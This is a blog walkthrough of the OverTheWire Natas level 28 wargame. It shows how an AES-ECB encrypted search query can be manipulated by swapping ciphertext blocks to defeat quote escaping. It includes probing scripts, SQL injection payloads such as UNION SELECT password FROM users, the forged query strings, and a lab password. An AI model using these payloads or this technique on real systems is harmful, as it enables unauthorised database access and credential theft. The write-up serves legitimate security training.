Nov 15, 2021 12 min read appsec

OverTheWire Natas Level 28 Walkthrough

This level was the hardest for me thus far, and is in fact a mix of web security and cryptography. Cryptography is not my strong suit and I had to lean on other write-ups for this one (vs solving it on my own) after beating my head against the wall. The write-ups are linked at the end of this post. While there’s a lot of value in figuring things out on your own, I feel like I learned quite a bit through reading/watching other people’s walkthroughs.

Writing this walkthrough has also been massively helpful for my own understanding, and I hope it’s useful for others too.

What is Natas?

Natas is an online hacking game meant to help you learn and practice security concepts.

OverTheWire is a website with a number of “war games”, which are online hacking games that allow you to practice security concepts. If you are looking for a beginner introduction to web security (albeit an older tech stack), then Natas is a great place to start.

Natas is hosted on different subdomains following the pattern of http://natas<level#>.natas.labs.overthewire.org. As you progress through the levels, you’ll need to increment the level number in the URL in order to view the correct level.

Each level requires the levels below it to be solved, so you will need the level 28 flag found in level 27 to begin this walkthrough. As before, make sure you keep notes and write down the passwords as you find them!

Level 28 ➔ 29

Open up http://natas28.natas.labs.overthewire.org and log in with username natas28 and password 55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ from the previous writeup.

This level begins harmlessly enough, with a database search input similar to what we’ve seen before with the “dictionary.txt” command injection levels.

You can try different queries and see some kinda 😐 jokes:

We aren’t given source code, but it does say that it’s a database. If we try SQL injection by submitting a search query of '… we don’t get anything useful. They must be escaping that character, as we get results back that have literal single quotes in them:

After a couple queries, I realized that, when a POST request is submitted, we’re forwarded to search.php and a huuuge query string is appended to the URL:

http://natas28.natas.labs.overthewire.org/search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPKriAqPE2%2B%2BuYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq%2FLC12hqpypTFRyXA%3D

If we clean up this URL by removing everything up to query= and then URL-decode it, the query looks like this:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKriAqPE2++uYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq/LC12hqpypTFRyXA=

This is a base64-encoded string, but attempts to decode it into something useful using CyberChef proved unfruitful.
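Even when the decoded bytes look like noise, their length is a useful clue. Here is a minimal sketch (standard library only, variable names are my own) that URL-decodes and base64-decodes the query value from the URL above and checks its size:

```python
import base64
import urllib.parse

# Query value copied from the search.php URL above (still URL-encoded).
encoded = "G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPKriAqPE2%2B%2BuYlniRMkobB1vfoQVOxoUVz5bypVRFkZR5BPSyq%2FLC12hqpypTFRyXA%3D"

b64_text = urllib.parse.unquote(encoded)  # %2B -> +, %2F -> /, %3D -> =
raw = base64.b64decode(b64_text)

print(len(raw), "bytes")
print("multiple of 16:", len(raw) % 16 == 0)
print(raw[:16].hex())  # binary data, not readable text
```

The length is a multiple of 16, which is what you would expect from a block cipher such as AES rather than from plain encoding.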

Padding Error

From there, I messed around with the string (removing chars, etc.) and got this PKCS#7 padding error:

If you do a Google search for this error, you’ll get a lot of messages about AES, block sizes, and similar cryptographic topics.

As mentioned earlier, I wasn’t familiar enough with cryptography to know exactly what this meant. It seemed like the error was somehow related to an AES block cipher encryption, where 1. there was a fixed block size of data to be encrypted/decrypted, and 2. the information was not conforming to this length, probably because I modified it.
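For reference, PKCS#7 padding itself is simple: append N bytes, each with the value N, until the data fills a whole block. The sketch below is my own illustration of the scheme, not the server's code (the function names are made up). It shows why tampered data tends to trigger a padding error: after decryption, the final bytes no longer form a valid pad.

```python
BLOCK_SIZE = 16  # AES block size in bytes

def pkcs7_pad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Append N bytes of value N so the length becomes a multiple of block_size."""
    n = block_size - (len(data) % block_size)
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Strip PKCS#7 padding, raising ValueError if it is malformed."""
    if not data or len(data) % block_size != 0:
        raise ValueError("length is not a multiple of the block size")
    n = data[-1]
    if n < 1 or n > block_size or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid PKCS#7 padding")
    return data[:-n]

padded = pkcs7_pad(b"hello")
print(padded)               # b"hello" followed by eleven 0x0b bytes
print(pkcs7_unpad(padded))  # b"hello"
```

Note that data which already fills a block exactly still gets a full extra block of padding, which matters later when we watch the ciphertext length grow.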

I tried a bunch of queries and noticed that the start of the query was always the same (G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP), as was the end (c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI), given a single-character query:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIkA4mnOUKh8BvERzIoyMYtc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPKaJ+w3LEi9VL2x96EIV7z3c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI1ZuexNCnLbVB/YkQXe5JOc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPI/dr/07Kww/CqqxthJgd+Ec4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIUfzbKV4Hs4bPdElNkG0UVc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI

My original idea was a padding oracle attack. But given the PKCS#7 error and the repeating blocks, it’s more likely that the data is encrypted with a block cipher in ECB (electronic codebook) mode.

This mode is insecure for most applications, because there is no chaining or other dependency between blocks. Instead, each block of plaintext is encrypted independently with the same key, meaning that identical plaintext blocks always produce identical ciphertext blocks. In cryptographic terms, this is known as a lack of diffusion: the method of encryption does not hide data patterns well.

Something I only noticed after I solved this challenge (while writing this walkthrough) is this useful hint from Wikipedia:

ECB mode can also make protocols without integrity protection even more susceptible to replay attacks, since each block gets decrypted in exactly the same way.

If ECB encrypts blocks individually into cipher blocks, that means that cipher blocks are individually decrypted back into plaintext blocks.

That means that patterns are clearly visible (a no-no in cryptography) and that we might be able to mix and match blocks to our liking. In other words, a replay attack.
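To make both properties concrete, here is a toy sketch. It does not use AES: the "cipher" is a fixed-key XOR that I made up as a stand-in, and it is trivially breakable. What it shares with real ECB is that every 16-byte block is transformed independently with the same key.

```python
BLOCK = 16
KEY = bytes(range(1, BLOCK + 1))  # arbitrary toy key, not a real secret

def toy_encrypt_block(block: bytes) -> bytes:
    # Toy stand-in for AES: XOR with a fixed key. Insecure, but like a real
    # block cipher it is a fixed, invertible mapping for a given key.
    return bytes(b ^ k for b, k in zip(block, KEY))

toy_decrypt_block = toy_encrypt_block  # XOR is its own inverse

def ecb(data: bytes, block_fn) -> bytes:
    # ECB: process each 16-byte block on its own, with no chaining.
    assert len(data) % BLOCK == 0
    return b"".join(block_fn(data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))

plaintext = b"A" * 16 + b"B" * 16 + b"A" * 16
ct = ecb(plaintext, toy_encrypt_block)
blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]

# Identical plaintext blocks give identical ciphertext blocks.
print(blocks[0] == blocks[2])

# Reorder ciphertext blocks without touching the key, then decrypt.
swapped = blocks[1] + blocks[0] + blocks[2]
print(ecb(swapped, toy_decrypt_block))
```

The decrypted result is simply the plaintext blocks in the new order, which is the property the rest of this walkthrough relies on.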

Finding the block size

If we want to swap out blocks and modify the query, we’ll first need to know what the block size is. I originally tried to do this by deleting parts of the query, but scripting turned out to be a much better option.

Here’s my script, which sends one character, then two, then three, and so on up until 16 characters of input:

import requests
import string
from requests.auth import HTTPBasicAuth
import urllib.parse

# Credentials for this level (substitute the natas28 password you found if it differs)
basicAuth=HTTPBasicAuth('natas28', 'JWwR438wkgTsNKBbcJoowyysdM82YjeF')

u="http://natas28.natas.labs.overthewire.org/index.php"

headers = {'Content-Type': 'application/x-www-form-urlencoded' }

# Send 0 to 16 A's and print the URL we are redirected to,
# which carries the encrypted query string
for count in range(17):
    data = "query=" + "A"*count
    response = requests.post(u, headers=headers, data=data, auth=basicAuth, verify=False, allow_redirects=True)
    print("{:02d}".format(count), "chars ", urllib.parse.unquote(response.url))

print("Done!")

I’m not worried about the database results, just the query string that is created. The idea is that this somehow maps to a database query that’s being performed using our input.

In the output, you can see three things.

First, the red box shows how the beginning of the string is always the same.
Second, the blue box shows how the next part of the string changes when we go from 9 to 10 chars of user-supplied input.
Third, when the input goes from 11 to 12 chars in length, the overall query length increases.

This increase in length and the length of the string in the blue box are roughly the same size. If we take an example string from the blue box, JfIqcn9iVBmkZvmvU4kfmy, it is 22 characters long in base64 form but 16 bytes once we base64-decode it.

This tells us that the block size is 16.
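The same reasoning can be written as a small helper: grow the input one character at a time and report the size of the first jump in ciphertext length. In the sketch below, fake_server_len is a hypothetical stand-in for the real server, and its prefix and suffix lengths are made up so that the jump happens between 11 and 12 characters, as in the output above.

```python
from typing import Callable

def detect_block_size(ciphertext_len: Callable[[int], int], max_input: int = 64) -> int:
    """Return the size of the first jump in ciphertext length as the input grows."""
    base = ciphertext_len(0)
    for n in range(1, max_input + 1):
        grown = ciphertext_len(n)
        if grown > base:
            return grown - base
    raise ValueError("no length increase observed")

# Hypothetical model of the server: unknown text before and after our input,
# padded PKCS#7-style to a 16-byte boundary. The 38 and 30 are invented values.
def fake_server_len(n: int, prefix: int = 38, suffix: int = 30, block: int = 16) -> int:
    total = prefix + n + suffix
    return total + (block - total % block)

print(detect_block_size(fake_server_len))
```

Against the real level, ciphertext_len would wrap the POST request from the script above and return the length of the base64-decoded query value.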

Testing out different characters

At this point, we know that the block size is 16, and now we can move on to caring about the actual content of our query.

We also know that it takes 10 characters to change the value of the third block. Before we go any further, let’s recap our current block observations for queries under 10 characters long:

Blocks 1 and 2 are always the same, like they’re the start of the query. Nothing we input will modify this.
Block 3 reflects our actual input*
Block 4 and 5 are always the same (for small inputs with valid characters), like some kind of trailing portion of the query.

What do I mean by “valid characters” and why did I put the asterisk on there?

Because if we try 10 characters and vary the last character to determine a pattern, something weird happens for a few characters.

Here’s the new script loop (using the same format and imports as the script above):

for c in string.printable:
    # Pass a dict so requests form-encodes characters like &, +, % and #
    data = {"query": "A"*9 + c}
    response = requests.post(u, headers=headers, data=data, auth=basicAuth, verify=False, allow_redirects=True)
    newUrl = urllib.parse.unquote(response.url)
    # Split once on "query=" so any trailing base64 "=" padding is kept
    query = newUrl.split("query=", 1)[1]
    print(c, "\t", query)
    print("length: ", len(query))

This code sends AAAAAAAAA followed by each character of string.printable in turn (for example AAAAAAAAAa, AAAAAAAAAb, AAAAAAAAAc). Besides digits and letters, the string.printable constant also includes punctuation such as .!@#$%^&*()'"/ and whitespace.

Here’s the output of strings ending in a, b, and c respectively:

a:  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  IkA4mnOUKh8BvERzIoyMYt  c4pf+0pFACRndRda5Za71v  NN8znGntzhH2ZQu87WJwI
b:  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  KaJ+w3LEi9VL2x96EIV7z3  c4pf+0pFACRndRda5Za71v  NN8znGntzhH2ZQu87WJwI
c:  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  I1ZuexNCnLbVB/YkQXe5JO  c4pf+0pFACRndRda5Za71v  NN8znGntzhH2ZQu87WJwI

Spaces added to visualize the blocks better.

All of the punctuation follows this same pattern (1st and 2nd blocks the same, 4th and 5th blocks the same), with three exceptions:

':  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  IWJ2pwLjKxd0ddiQ3a1c5l  stdkbwCSkbjZzJR1Froznc  qM9OYQkTq645oGdhkgSlo
":  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  IWJ2pwLjKxd0ddiQ3a1c5l  e0uzFQTQyTJF5uPUK3I8gM  qM9OYQkTq645oGdhkgSlo
\:  G+glEae6W/1XjA7vRm21n  NyEco/c+J2TdR0Qp8dcjP  IWJ2pwLjKxd0ddiQ3a1c5l  fN5woKhSkQjlY0g5eVSYnc  qM9OYQkTq645oGdhkgSlo

', ", and \ all have identical 1st, 2nd, 3rd, and 5th blocks.
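Because 16 bytes do not map onto a whole number of base64 characters, the visual split above is only approximate. A more precise check is to decode the strings and compare them 16 bytes at a time. This is a sketch using four of the rows above; the helper names are my own.

```python
import base64

BLOCK = 16

def blocks(b64_text: str) -> list[bytes]:
    """Decode base64 (restoring trimmed padding) and split into 16-byte blocks."""
    b64_text = b64_text.replace(" ", "")
    b64_text += "=" * (-len(b64_text) % 4)
    raw = base64.b64decode(b64_text)
    return [raw[i:i + BLOCK] for i in range(0, len(raw), BLOCK)]

def differing_blocks(a: str, b: str) -> list[int]:
    """Return the 1-based numbers of the blocks that differ between two ciphertexts."""
    pairs = zip(blocks(a), blocks(b))
    return [i for i, (x, y) in enumerate(pairs, start=1) if x != y]

HEADER = "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP"
row_a = HEADER + "IkA4mnOUKh8BvERzIoyMYt" + "c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI"
row_b = HEADER + "KaJ+w3LEi9VL2x96EIV7z3" + "c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI"
row_single = HEADER + "IWJ2pwLjKxd0ddiQ3a1c5l" + "stdkbwCSkbjZzJR1Froznc" + "qM9OYQkTq645oGdhkgSlo"
row_double = HEADER + "IWJ2pwLjKxd0ddiQ3a1c5l" + "e0uzFQTQyTJF5uPUK3I8gM" + "qM9OYQkTq645oGdhkgSlo"

print(differing_blocks(row_a, row_b))            # a vs b
print(differing_blocks(row_single, row_double))  # ' vs "
print(differing_blocks(row_a, row_single))       # a vs '
```

For ordinary characters only block 3 moves, while the single and double quote rows differ from each other only in block 4. That fits the guess that the quote itself has been pushed into the next block.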

The educated guess in this scenario is that 1. these punctuation characters are disallowed and being escaped and 2. that modified query is what is showing up in the 3rd block (which up until this point has varied with each input).

In other words, we send in AAAAAAAAA' and it modifies that query to be AAAAAAAAA\' instead.

Strategy

Since the 16-byte blocks are individually encrypted/decrypted, and we have a guess at what behavior is happening when we try to do SQL injection, how can we use this to our advantage?

Let’s revisit the character escaping. Visually, it looks like this. This first block is what we want our query to be, separated into the 5 blocks that we get with a query of this size:

But the program is (probably, as best as we are able to guess) inserting a \ in front of the ' and pushing the rest of our query (which at this point is just the single ') into the next block. Then the program presumably adds padding so that there is a full block’s worth of data to encrypt.

This modifies the remainder of our query (in part due to padding sizes) but more importantly for our SQL injection, it renders our query useless, because the ' that would be creating the injection is being escaped.

Remember that blocks are individually encrypted/decrypted, meaning that we can swap them out. What if we make a malicious query (as we’ve done above, something like AAAAAAAAA' OR 1=1 -- ) and then swap out the block that’s preventing SQL injection? That would look like this:

This is only possible because of the 9 A’s padding the query. They let us align the \' right at the boundary of the 3rd and 4th blocks, so that the \ ends block 3 and the ' starts block 4, and we can swap out the 3rd block.
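The alignment is easier to see in plaintext. The sketch below is a guess at the layout, not the server's real code. It assumes the escape character is a backslash (as in the AAAAAAAAA\' example earlier) and that 6 unknown bytes share block 3 with our input, which is inferred from the observation that 10 input characters fill the block. Those unknown bytes are shown as ?.

```python
BLOCK = 16

def escape(query: str) -> str:
    # Assumed server behaviour: put a backslash in front of ', " and \.
    return "".join("\\" + ch if ch in "'\"\\" else ch for ch in query)

def layout(query: str, unknown_in_block3: int = 6) -> list[str]:
    # "?" marks unknown bytes that share block 3 with our input (assumed count).
    text = "?" * unknown_in_block3 + escape(query)
    return [text[i:i + BLOCK] for i in range(0, len(text), BLOCK)]

for number, block in enumerate(layout("AAAAAAAAA' OR 1=1 -- "), start=3):
    print(number, repr(block))
```

Block 3 ends with the backslash and block 4 starts with the quote, so replacing block 3 removes the escape while leaving the injection intact. Whatever the server appends after our input is not modelled here.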

Creating our query

With this strategy, we need to collect a few pieces first.

Known good header

We need a “known good” start of the query, which is shown in green above. This is easy to find, as we’ve seen it in every single query thus far:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP

Known good trailer

Second, we need a “known good” trailer. I’m not really sure what the purpose of this is in terms of how it might fit into a SQL query, but it seems to be important. This is represented by the blue block(s) above. A known good trailer is as follows:

c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

Dummy block

Third, we need a “dummy” block. This is the block that we will swap out in place of the escaped character that occurs in the third block in the diagrams above. The dummy block is represented in gray. If we make a query of 10 spaces, we get a query string (URL-decoded) of:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

We recognize the first two blocks as the “known good” header, and the last two blocks as the “known good” trailer, so if we remove those, we’re left with a dummy block of:

ItlMM3qTizkRB5P2zYxJsb

Known bad third block

We know that a single quote causes some kind of change in the third block. If we know exactly what this block looks like, it’ll be easier to remove it later.

If we do a query for AAAAAAAAA' as in the experiments earlier in this post, we see that the third block is IWJ2pwLjKxd0ddiQ3a1c5l. This is our “known bad” value.

Query formula

The last piece is our SQL injection, which we’ll get to in just a minute. First let’s talk about the formula of the query. We will submit a query with AAAAAAAAA' (9 A’s and then a single quote), followed by our SQL injection.

For example, we’ll send: AAAAAAAAA' OR 1=1 --

We’ll take this query, and deconstruct it (mentally) into a structure like:

[known good header] [block we know contains a \ to escape our SQL injection] [SQL injection and trailer]

We’ll then use CyberChef or another editor to take the third block out (the one with the \) and replace it with our dummy block. We’ll also copy/paste our original trailer at the end:

[known good header] [dummy block] [SQL injection] [known good trailer]

This will need to be fully URL-encoded. I say “fully” because some Python implementations do not substitute out all characters (I used CyberChef instead).
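In Python's standard library, the difference comes down to the safe parameter of urllib.parse.quote, which defaults to "/" and therefore leaves slashes alone. A short illustration using the known good header as sample input:

```python
import urllib.parse

sample = "G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP"

print(urllib.parse.quote(sample))           # default safe="/" leaves slashes as-is
print(urllib.parse.quote(sample, safe=""))  # also encodes "/" as %2F
```

The + characters matter most: in a form-encoded query string an unencoded + is normally read as a space, which would corrupt the base64 value.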

This entire process is shown in the diagram below. The pink text represents the first request, which we assume has some kind of escaping character (like \) in it. We overwrite that block with our dummy block, and then resend the entire request.
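For anyone who prefers a script to CyberChef, the formula can be sketched as a function that works on decoded bytes instead of base64 text. This is one possible implementation, not the method used in this post. The names splice and as_query_value are made up, and it assumes the layout described so far: two header blocks, one block to replace, and a two-block trailer in the 10-space query.

```python
import base64
import urllib.parse

BLOCK = 16

def splice(dummy_b64: str, injection_b64: str) -> str:
    """Build [header][dummy block][injection blocks][trailer] from two ciphertexts."""
    dummy = base64.b64decode(dummy_b64 + "=" * (-len(dummy_b64) % 4))
    injection = base64.b64decode(injection_b64 + "=" * (-len(injection_b64) % 4))

    header = dummy[:2 * BLOCK]                # blocks 1-2, the same in every response
    dummy_block = dummy[2 * BLOCK:3 * BLOCK]  # block 3 of the 10-space query
    trailer = dummy[3 * BLOCK:]               # remaining blocks of the 10-space query
    payload = injection[3 * BLOCK:]           # everything after the escaped block

    forged = header + dummy_block + payload + trailer
    return base64.b64encode(forged).decode()

def as_query_value(b64_text: str) -> str:
    # Encode every reserved character, including "/", "+" and "=".
    return urllib.parse.quote(b64_text, safe="")
```

Here dummy_b64 is the URL-decoded query value returned for the 10-space search and injection_b64 is the one returned for the padded SQL injection. The result of as_query_value(splice(dummy_b64, injection_b64)) goes after search.php/?query= in the URL.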

Are there more graceful ways of doing this? Probably. But manually editing the queries helped reduce the amount of abstraction for me. It’s still pretty abstract though, so let’s work through some examples.

' OR 1=1 --

The “hello world” of SQL injection is getting all records to be returned using ' OR 1=1 --. Let’s try it out.

First, we make our query with 9 A’s, then our SQL injection:

AAAAAAAAA' OR 1=1 --

The program will insert a \ and this will push the ' into the next block (since it takes 10 characters to fill up the block, and 9 A’s plus a \ make 10). We will effectively have sent this query:

AAAAAAAAA\' OR 1=1 --

Copy paste the original query of AAAAAAAAA' OR 1=1 -- (don’t miss the space at the end!) and try it out in the database search. You should get a URL query of:

http://natas28.natas.labs.overthewire.org/search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPIvcyrxjhb4D1smChUE%2FAaCs1j%2F6bcmnQre%2FN2GUxOg60HAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b%2BK

URL decode this and remove the start of the URL up to the =. The result is:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIWJ2pwLjKxd0ddiQ3a1c5lWY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b+K

Remove the known good header (G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP) and the known bad block (IWJ2pwLjKxd0ddiQ3a1c5l). That leaves us with the encrypted SQL injection query:

WY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b+K

Now, we need to reconstruct our query:

Known good header: G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP
Dummy block: ItlMM3qTizkRB5P2zYxJsb
SQL injection: WY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b+K
Known good trailer: c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

Redundant? Yes. Scriptable? Also yes. But oh well. Concatenate these strings together, remove new lines, and you get:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbWY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b+Kc4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

URL encode this, and submit it as a query:

http://natas28.natas.labs.overthewire.org/search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbWY4bHaEWFEfgtXy4iixC3kHAmMS6zcXtk1dWTlEF3X5k0NzIaCU2kq38vTeW0b%2BKc4pf%2B0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI%3D

We seem to get a lot of results back, so I think it worked!

Discovering database schema

Now that we’ve got a working proof of concept, let’s try to learn about the database schema with a query like ' UNION SELECT table_name FROM information_schema.tables; -- . With our A-padding:

AAAAAAAAA' UNION SELECT table_name FROM information_schema.tables; --

This translates into a query string of:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIWJ2pwLjKxd0ddiQ3a1c5lr0T1ii+Ysw9O0BMRL2Q9HUY+Hp7DfIbgLrY9HzzScnSwiwIQQLHbuTybkf0vfvyOoqRnCxfnbDr4842Rxdxh1GSGlUrqRvuT6auFhFtPS9DX/ytyVFP8KUcB5R9dfA+O

Take out the first three blocks (header and bad block) and you get this:

r0T1ii+Ysw9O0BMRL2Q9HUY+Hp7DfIbgLrY9HzzScnSwiwIQQLHbuTybkf0vfvyOoqRnCxfnbDr4842Rxdxh1GSGlUrqRvuT6auFhFtPS9DX/ytyVFP8KUcB5R9dfA+O

Then add the header and dummy block back in, append the trailer at the end and you get (line breaks for clarity):

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP
ItlMM3qTizkRB5P2zYxJsb
r0T1ii+Ysw9O0BMRL2Q9HUY+Hp7DfIbgLrY9HzzScnSwiwIQQLHbuTybkf0vfvyOoqRnCxfnbDr4842Rxdxh1GSGlUrqRvuT6auFhFtPS9DX/ytyVFP8KUcB5R9dfA+O
c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

Now URL encode, and you get this query:

http://natas28.natas.labs.overthewire.org/search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbr0T1ii%2BYsw9O0BMRL2Q9HUY%2BHp7DfIbgLrY9HzzScnSwiwIQQLHbuTybkf0vfvyOoqRnCxfnbDr4842Rxdxh1GSGlUrqRvuT6auFhFtPS9DX%2FytyVFP8KUcB5R9dfA%2BOc4pf%2B0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI%3D

Here are the relevant database tables:

We have a jokes table and a users table. The rest are standard MySQL tables that we can ignore.

Natas Level 28 Solution

At this point, you could run another query to figure out what columns exist, but all the past levels have included username and password. So I’ll take a guess that our final SQL injection query will be:

' UNION SELECT ALL password FROM users; --

With the padding:

AAAAAAAAA' UNION SELECT ALL password FROM users; --

Send that as an input to get this encrypted query string:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPIWJ2pwLjKxd0ddiQ3a1c5l+76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons=

After URL decoding, remove the first three blocks (header and bad block):

+76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons=

Add the header and dummy block back to the front, and the trailer on the end:

G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjP ItlMM3qTizkRB5P2zYxJsb +76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons= c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI=

This actually gave me some trouble, so I base64-decoded each of the sections in CyberChef, and used the resulting hex output in a new query where I re-encoded it as base64, then URL encoded it:

The resulting query is:

G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsb%2B76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ%2FOntzil%2F7SkUAJGd1F1rllrvW803zOcae3OEfZlC7ztYnAg%3D%3D
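A likely reason plain copy/paste failed this time: the injection section ends in = padding, so its byte length is not a multiple of 3, and base64 text cannot be joined directly at that point. The earlier examples happened to line up. Joining the decoded bytes and re-encoding avoids the problem, which is what the CyberChef detour did. A minimal sketch with the two sections from this step:

```python
import base64

# Injection section and trailer from this step, as base64 text.
payload_b64 = "+76GKJOY6adng39QUMPprGe5X2vrsM8BRZAxT9Bt8cmSBdGBYutGkE7dxkKLuB1QrDuHHBxEg4a0XNNtno9y9GVRSbu6ISPYnZVBfqJ/Ons="
trailer_b64 = "c4pf+0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI="

# "=" is only valid at the very end of base64 text, so strict decoding
# rejects the two strings glued together.
try:
    base64.b64decode(payload_b64 + trailer_b64, validate=True)
    naive_ok = True
except ValueError:  # binascii.Error is a subclass of ValueError
    naive_ok = False
print("naive concatenation decodes cleanly:", naive_ok)

# Join the raw bytes instead, then encode once.
joined = base64.b64decode(payload_b64) + base64.b64decode(trailer_b64)
rejoined_b64 = base64.b64encode(joined).decode()
print(len(joined), "bytes")
print(rejoined_b64[-52:])
```

The re-encoded tail no longer matches the trailer text character for character, because the base64 characters now straddle the byte boundary differently. That is why the end of the resulting query above looks unfamiliar even though the underlying blocks are unchanged.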

And yes, once again, this could be done programmatically. But once I figured out what I wanted to do conceptually, I was able to do it quickly enough with CyberChef and never made it into a script.

Here’s our password:

Takeaway: ECB is not secure, since we were able to swap out blocks to our liking.